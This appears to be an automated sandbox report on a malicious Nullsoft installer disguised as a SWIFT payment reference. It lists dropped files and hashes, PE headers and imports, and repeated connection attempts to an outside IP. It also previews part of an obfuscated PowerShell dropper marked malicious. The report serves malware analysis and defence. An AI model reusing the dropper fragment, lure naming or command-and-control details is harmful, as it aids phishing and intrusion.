Preview:	PSMODULECACHE.....$7o..z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$7o..z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Temp\Vitis.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	403933
Entropy (8bit):	7.911407065791383
Encrypted:	false
SSDEEP:	6144:ONeZyO6KKoPz70NjFXAokZnpWRClI/4HGJ/xCQN7lfIVDw9SbcpIJGgD:ONl5KKwMUZpWiIgHGJjTfaDsSgpIJp
MD5:	724AC474C4FCAA1DF6DA3F9245AC9C85
SHA1:	C68CC50C2BD9E44C87FBCA76C4EBD0C7B9942B3D
SHA-256:	D223088DD0D29E76253A5CFCBF1CFAF05312285F2F2F60AEAFC6E8A96EFCBCDE
SHA-512:	339B700A684E5520BF05E35DE0594A015C57C513B68B690C37E5F8A0336EF5253B4C756C0052931317CC8581C5AC9562093A4BE97525B9FFF676440AF2E3BE21
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 58%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L....Oa.................f...*.......4............@..........................P............@..............................................]...........................................................................................................text....e.......f.................. ..`.rdata...............j..............@..@.data...8............~..............@....ndata...@...............................rsrc....].......^..................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Vitis.exe:Zone.Identifier

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_af3as4dx.pex.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ng2smkti.dbo.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\medlemskartotek\vejmaterialerne\Noncausal.tre

Download File

Process:	C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe
File Type:	data
Category:	dropped
Size (bytes):	365557
Entropy (8bit):	7.637858645077539
Encrypted:	false
SSDEEP:	6144:KFl5fm/WLsKd/8vsujrdqNd7FM26W5LrTiDbtGpoi/TQr7cMyt:KLUeLwvzdEFNRiHkpZyPyt
MD5:	5C953FBFC930A495E5DC86BE951FA70D
SHA1:	95A09B1B0D2F5F51CFFCD6BC2A3FFB535472DD5E
SHA-256:	AD86C68EC47D82F814DDA4C36900755A9A880CEFFAA7C7D4420C941EF74961A2
SHA-512:	39EACD484FCCB6C97B283298FA4FB0D3BC4BC25FDD1AA2E699F321149FD0F7B3EE503EBAA667EC37640AF7740F55BDD1669E1F6A7FE8B4F88070E2B8952CB587
Malicious:	false
Preview:	...........^^.VVV.........$......qq.z.........1.K...............,,,.J........,,..=....ee.....;...................................................E............................UUUU..................ww.......}}}.7...........................................................................<<<...................g....=......A......x.....66.....Y........XX......g......YYYY.................9....^......5....l...........\|\|\|\|..((.......%......++.M.......VV..........&..................r.......................ccc........2....l........."....__.....__..44.......................$$............................................w.....##............................1111...Y.....6../......7.}}}.v.........F........``.......q.##.....?..zzzz..............y................PPPPPPP.&&....B.............a.kk.......&&..).,............77.....................JJ.ee....................................vvv......>>....................8888.d....................~........8......0000.4444.J.....M......b........................TT.

C:\Users\user\AppData\Local\Temp\medlemskartotek\vejmaterialerne\Profilen127.Aff

Download File

Process:	C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe
File Type:	ASCII text, with very long lines (58469), with no line terminators
Category:	dropped
Size (bytes):	58469
Entropy (8bit):	5.369745148282174
Encrypted:	false
SSDEEP:	1536:yUSQdTKTU/DH1zaPRhjszN3pikKyRdK8jXLx:yUSyKUDH1zwZ43piERo8h
MD5:	84E620FE4B523DDC7891437371279919
SHA1:	991E05D10D65983682D44654598EF7FE4DDD0D3D
SHA-256:	2E8CCCA56461E9E413E18609E6A5BE32095D59F9D0ED65A9DB6479CE4312708D
SHA-512:	60AC1FDBAE8352420F1A806A34021ECCF3D56B6520982A60D2B57438ACA82AE1A5860799F577100E9EC1141C927F03E1384D1FA404CFBDB7AF53102BE66D33E5
Malicious:	true
Preview:	$Dottel=$Undervisningsdifferentieringernes;<#Pseudovidenskabelige Paraenetic Beget Hvdvundne #><#Overfladeberegningen Ricininic Unsatanically omstyrtning Bookingsystem Reaccumulation Organicismal #><#Afstedkomme Visioners Harrumphes Chunder #><#genetic Teltningens Venskabskamp Skippering Recaption Ducally #><#Lovhjemlens Indsens Tympanal #><#Tvehundene Vildgaas Craves Caruncle Draftier Millionrers #><#officinet rejsegodsforsikring Advocatrice Smagsstofferne Avitic #><#Apozymase Hidrre Eftergiven Burnishment Wontons Lnderne Massiveres #><#Scarifier Cebell Trohn tallyho Epifaunas #><#superinnocently Thirtyish Abiturers Kosteskaft Skarlagensfeber raabalancerne #><#Studene Vejrmeldings fragil Ansttelsens #><#Dyvelsdrkkets Lefleris Dvrgpapegje Forlovelsesgaves Skrotter Fuldbyrdelsesfristens #><#Efficacity Landbrugsjords Indeholdtes #><#Tragasol Engraving Cirkulrebreves Reifikationerne Apophysate #><#Fuldautomatisere Uhindret Ypperligt Gruppedynamisk #><#Eteocretes Regnbuehinden Ratihabere R

C:\Users\user\AppData\Local\Temp\medlemskartotek\vejmaterialerne\mymarid.ost

Download File

Process:	C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe
File Type:	data
Category:	dropped
Size (bytes):	1816
Entropy (8bit):	4.90001051519151
Encrypted:	false
SSDEEP:	48:CsKfwRMEaweDkN4ESwkpkMNcvybvDX/6suFE:CrfwWREHSwEAyHisuFE
MD5:	47A8E2645F9FCD360C294B7B4C0DCE60
SHA1:	996713E2466113F2707289D8B9752BB4BCA9E490
SHA-256:	07F4132A0A34AF2D1AF3254E13C06C09529AFBDAB758EDAD4003E91F91B750D6
SHA-512:	8FB0068828DCF6E2722187C4E767B5BC8CD7E550E4D53281E21A928A0AE5DD2C3635302F43BEDFFBC2640831445D234C5E00F71ADA30B4EC6CD112645395D23D
Malicious:	false
Preview:	.........r<.B....MJ........._........i..%.m....HO....._..........:........r#...........cw....Q...j.....G........6................O....N.;.....'..8....0....\h..9..=.6..\......XB......z....u..5............2...............B(R.-....6.>K.y.....}...).......%..h...............\.B.....B......k....g......'Cs..c....q../.-BA.E.^......+....g..@..4\..m....N....M.......................................#.@...{)...2..a...m.....n............{.......>.....?...\|X0...=.....0........c.f........;......T...T.V.c.....M....p..$....g.(P...o........s..w............#...}.J....".-7.6.U....Y.....R.......'X.........9............n...Z.g...#...>.K....+.......Z....G.........{...[.....dD.......o...!...Z.`......<.s....".......RH$...x3.........Y.........,.... ..1.y......4.8.E.............'......./[..........y.....<u..V....._.....#.............'..\...................L....}.....R.......o......{1.[S..'.].~.......B.\..!e.7...l..............<......2.0.,.........R..s...`g..&.v.............z.l.......\|.U...I.a..:.......

C:\Users\user\Pictures\timetallenes.lnk

Download File

Process:	C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe
File Type:	MS Windows shortcut, Item id list present, Has Relative path, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
Category:	dropped
Size (bytes):	826
Entropy (8bit):	3.481175179082517
Encrypted:	false
SSDEEP:	12:8gl0ha/ledp8wXuQUlbqpsOtUxmbdpYmHbqetUflzJCN85v4t2YZ/elFlSJm:8tdO/9fcd9K24qy
MD5:	8333EA3F07B44564B34BDC3B84F4D820
SHA1:	BAF95230300663418624E494CA81FCC8D329624C
SHA-256:	E4EFE4FDBF86068C374181C790E6314B9249D76F5C98F96A0D3C128BE3806DC6
SHA-512:	8BD77DF59DAAD63876B1CAC69C2773F947B729EC449471B2B2AB9A8ABD1E3965C0BD06898F87DC412FAE8F301EB1619516E3590088124A82F91ED7E6E70A1824
Malicious:	false
Preview:	L..................F.............................................................P.O. .:i.....+00.../C:\...................z.1...........Program Files (x86).X............................................P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...".f.1...........Common Files..J............................................C.o.m.m.o.n. .F.i.l.e.s.......2...........Tankvognskrselsulykke.geo.d............................................T.a.n.k.v.o.g.n.s.k.r.s.e.l.s.u.l.y.k.k.e...g.e.o...(...C.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.C.o.m.m.o.n. .F.i.l.e.s.\.T.a.n.k.v.o.g.n.s.k.r.s.e.l.s.u.l.y.k.k.e...g.e.o.........,...............$M....>M...EQ ..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.2.................

C:\Windows\Resources\sans.lnk

Download File

Process:	C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe
File Type:	MS Windows shortcut, Item id list present, Has Relative path, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
Category:	dropped
Size (bytes):	922
Entropy (8bit):	2.9756559525609214
Encrypted:	false
SSDEEP:	12:8gl0gsXowAOcQ/tz+7RafgKDFlKiRKQ1mg/3NJkKAd4t2YZ/elFlSJm:8/LDaRMgK5Qi9449HAvqy
MD5:	EAF42A1813B1CCADB7388D860F2BC035
SHA1:	5143522890C76E6FB2C64A53F70237534B9078B1
SHA-256:	A17226D884E87B83E347A87DD0376D5CAB8D0C4206B19B8BB557ADF3CCF9C851
SHA-512:	6D99057433A96648423859ABB32D3668790A539DD51B4975074B7EF80B746924E752DC1C47B87526FD4FB3EC29A222D8E856789B9A27B0B16DC94F7E89B5EDD3
Malicious:	false
Preview:	L..................F........................................................#....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....P.1...........Local.<............................................L.o.c.a.l.....N.1...........Temp..:............................................T.e.m.p.....`.2...........truede.une..F............................................t.r.u.e.d.e...u.n.e......./.....\.....\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.t.r.u.e.d.e...u.n.e.........(.................l^".`G...3..qs................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.2.................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.911407065791383
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe
File size:	403'933 bytes
MD5:	724ac474c4fcaa1df6da3f9245ac9c85
SHA1:	c68cc50c2bd9e44c87fbca76c4ebd0c7b9942b3d
SHA256:	d223088dd0d29e76253a5cfcbf1cfaf05312285f2f2f60aeafc6e8a96efcbcde
SHA512:	339b700a684e5520bf05e35de0594a015c57c513b68b690c37e5f8a0336ef5253b4c756c0052931317cc8581c5ac9562093a4be97525b9fff676440af2e3be21
SSDEEP:	6144:ONeZyO6KKoPz70NjFXAokZnpWRClI/4HGJ/xCQN7lfIVDw9SbcpIJGgD:ONl5KKwMUZpWiIgHGJjTfaDsSgpIJp
TLSH:	E08412AED174C7EAC6A73E364F342A2511F96E3D31609BC7B72082953DED265861E3C0
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................f...*.....

File Icon


Icon Hash:	4080000000018245

Static PE Info

General

Entrypoint:	0x4034f7
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x614F9AE5 [Sat Sep 25 21:55:49 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	56a78d55f3f7af51443e58e0ce2fb5f6

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 000003F4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [ebp-14h], ebx
mov dword ptr [ebp-04h], 0040A2E0h
mov dword ptr [ebp-10h], ebx
call dword ptr [004080CCh]
mov esi, dword ptr [004080D0h]
lea eax, dword ptr [ebp-00000140h]
push eax
mov dword ptr [ebp-0000012Ch], ebx
mov dword ptr [ebp-2Ch], ebx
mov dword ptr [ebp-28h], ebx
mov dword ptr [ebp-00000140h], 0000011Ch
call esi
test eax, eax
jne 00007FAA90B77F9Ah
lea eax, dword ptr [ebp-00000140h]
mov dword ptr [ebp-00000140h], 00000114h
push eax
call esi
mov ax, word ptr [ebp-0000012Ch]
mov ecx, dword ptr [ebp-00000112h]
sub ax, 00000053h
add ecx, FFFFFFD0h
neg ax
sbb eax, eax
mov byte ptr [ebp-26h], 00000004h
not eax
and eax, ecx
mov word ptr [ebp-2Ch], ax
cmp dword ptr [ebp-0000013Ch], 0Ah
jnc 00007FAA90B77F6Ah
and word ptr [ebp-00000132h], 0000h
mov eax, dword ptr [ebp-00000134h]
movzx ecx, byte ptr [ebp-00000138h]
mov dword ptr [0042A2D8h], eax
xor eax, eax
mov ah, byte ptr [ebp-0000013Ch]
movzx eax, ax
or eax, ecx
xor ecx, ecx
mov ch, byte ptr [ebp-2Ch]
movzx ecx, cx
shl eax, 10h
or eax, ecx

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8504	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xaf000	0x5df8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6515	0x6600	26e66bea3b62728a217ae7bf343ebc1a	False	0.6615349264705882	data	6.439707948554623	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x139a	0x1400	691f0273dad50ec603f6fedf850b58ee	False	0.45	data	5.145774564074664	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x20338	0x600	4b75405561a3fcc45b8fe27a6808f3b5	False	0.4993489583333333	data	4.013698650446401	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2b000	0x84000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xaf000	0x5df8	0x5e00	6191a6c14b9a369918dcadc2e21b63da	False	0.23503989361702127	data	4.963722789547615	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xaf2c8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	English	United States	0.046680497925311204
RT_ICON	0xb1870	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	English	United States	0.07856472795497185
RT_ICON	0xb2918	0xdaf	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.8895232657721953
RT_ICON	0xb36c8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	English	United States	0.09508196721311475
RT_ICON	0xb4050	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	English	United States	0.16578014184397163
RT_DIALOG	0xb44b8	0x100	data	English	United States	0.5234375
RT_DIALOG	0xb45b8	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0xb46d8	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0xb47a0	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0xb4800	0x4c	data	English	United States	0.7763157894736842
RT_VERSION	0xb4850	0x264	data	English	United States	0.4820261437908497
RT_MANIFEST	0xb4ab8	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States	0.5542168674698795

Imports

DLL	Import
ADVAPI32.dll	RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
SHELL32.dll	SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
ole32.dll	OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
COMCTL32.dll	ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll	GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
GDI32.dll	SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll	GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 18, 2024 14:37:12.858056068 CET	49734	80	192.168.2.4	192.121.162.150
Mar 18, 2024 14:37:13.870683908 CET	49734	80	192.168.2.4	192.121.162.150
Mar 18, 2024 14:37:15.980103970 CET	49734	80	192.168.2.4	192.121.162.150
Mar 18, 2024 14:37:17.880008936 CET	49735	80	192.168.2.4	192.121.162.150
Mar 18, 2024 14:37:18.886368990 CET	49735	80	192.168.2.4	192.121.162.150
Mar 18, 2024 14:37:20.902003050 CET	49735	80	192.168.2.4	192.121.162.150
Mar 18, 2024 14:37:22.929032087 CET	49736	80	192.168.2.4	192.121.162.150
Mar 18, 2024 14:37:23.933207989 CET	49736	80	192.168.2.4	192.121.162.150
Mar 18, 2024 14:37:25.948805094 CET	49736	80	192.168.2.4	192.121.162.150
Mar 18, 2024 14:37:27.937608957 CET	49737	80	192.168.2.4	192.121.162.150
Mar 18, 2024 14:37:28.948818922 CET	49737	80	192.168.2.4	192.121.162.150
Mar 18, 2024 14:37:30.948879004 CET	49737	80	192.168.2.4	192.121.162.150
Mar 18, 2024 14:37:33.517576933 CET	49738	80	192.168.2.4	192.121.162.150
Mar 18, 2024 14:37:34.527015924 CET	49738	80	192.168.2.4	192.121.162.150
Mar 18, 2024 14:37:36.527043104 CET	49738	80	192.168.2.4	192.121.162.150
Mar 18, 2024 14:37:38.545180082 CET	49740	80	192.168.2.4	192.121.162.150
Mar 18, 2024 14:37:39.558254004 CET	49740	80	192.168.2.4	192.121.162.150
Mar 18, 2024 14:37:41.558243990 CET	49740	80	192.168.2.4	192.121.162.150
Mar 18, 2024 14:37:43.578187943 CET	49741	80	192.168.2.4	192.121.162.150
Mar 18, 2024 14:37:44.589478970 CET	49741	80	192.168.2.4	192.121.162.150
Mar 18, 2024 14:37:46.605068922 CET	49741	80	192.168.2.4	192.121.162.150
Mar 18, 2024 14:37:48.623223066 CET	49742	80	192.168.2.4	192.121.162.150
Mar 18, 2024 14:37:49.636384964 CET	49742	80	192.168.2.4	192.121.162.150
Mar 18, 2024 14:37:51.636313915 CET	49742	80	192.168.2.4	192.121.162.150
Mar 18, 2024 14:37:53.654356003 CET	49743	80	192.168.2.4	192.121.162.150
Mar 18, 2024 14:37:54.667618990 CET	49743	80	192.168.2.4	192.121.162.150
Mar 18, 2024 14:37:56.683202982 CET	49743	80	192.168.2.4	192.121.162.150
Mar 18, 2024 14:37:58.687094927 CET	49744	80	192.168.2.4	192.121.162.150
Mar 18, 2024 14:37:59.698995113 CET	49744	80	192.168.2.4	192.121.162.150
Mar 18, 2024 14:38:01.714447975 CET	49744	80	192.168.2.4	192.121.162.150
Mar 18, 2024 14:38:03.772543907 CET	49745	80	192.168.2.4	192.121.162.150
Mar 18, 2024 14:38:04.777014017 CET	49745	80	192.168.2.4	192.121.162.150
Mar 18, 2024 14:38:06.776937962 CET	49745	80	192.168.2.4	192.121.162.150
Mar 18, 2024 14:38:08.780987978 CET	49746	80	192.168.2.4	192.121.162.150
Mar 18, 2024 14:38:09.776978970 CET	49746	80	192.168.2.4	192.121.162.150
Mar 18, 2024 14:38:11.778013945 CET	49746	80	192.168.2.4	192.121.162.150
Mar 18, 2024 14:38:13.813014984 CET	49747	80	192.168.2.4	192.121.162.150
Mar 18, 2024 14:38:14.823847055 CET	49747	80	192.168.2.4	192.121.162.150
Mar 18, 2024 14:38:16.839447975 CET	49747	80	192.168.2.4	192.121.162.150
Mar 18, 2024 14:38:18.827214003 CET	49748	80	192.168.2.4	192.121.162.150
Mar 18, 2024 14:38:19.839507103 CET	49748	80	192.168.2.4	192.121.162.150
Mar 18, 2024 14:38:21.839479923 CET	49748	80	192.168.2.4	192.121.162.150
Mar 18, 2024 14:38:23.841814041 CET	49749	80	192.168.2.4	192.121.162.150
Mar 18, 2024 14:38:24.855098963 CET	49749	80	192.168.2.4	192.121.162.150
Mar 18, 2024 14:38:26.855122089 CET	49749	80	192.168.2.4	192.121.162.150
Mar 18, 2024 14:38:28.875063896 CET	49750	80	192.168.2.4	192.121.162.150
Mar 18, 2024 14:38:29.886324883 CET	49750	80	192.168.2.4	192.121.162.150
Mar 18, 2024 14:38:31.902004004 CET	49750	80	192.168.2.4	192.121.162.150
Mar 18, 2024 14:38:33.904390097 CET	49751	80	192.168.2.4	192.121.162.150
Mar 18, 2024 14:38:34.917704105 CET	49751	80	192.168.2.4	192.121.162.150
Mar 18, 2024 14:38:36.917612076 CET	49751	80	192.168.2.4	192.121.162.150
Mar 18, 2024 14:38:38.938474894 CET	49752	80	192.168.2.4	192.121.162.150
Mar 18, 2024 14:38:39.948991060 CET	49752	80	192.168.2.4	192.121.162.150
Mar 18, 2024 14:38:41.964454889 CET	49752	80	192.168.2.4	192.121.162.150
Mar 18, 2024 14:38:43.959647894 CET	49753	80	192.168.2.4	192.121.162.150
Mar 18, 2024 14:38:44.964459896 CET	49753	80	192.168.2.4	192.121.162.150
Mar 18, 2024 14:38:46.964452982 CET	49753	80	192.168.2.4	192.121.162.150

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 18, 2024 14:37:12.398525000 CET	52673	53	192.168.2.4	1.1.1.1
Mar 18, 2024 14:37:12.559487104 CET	53	52673	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
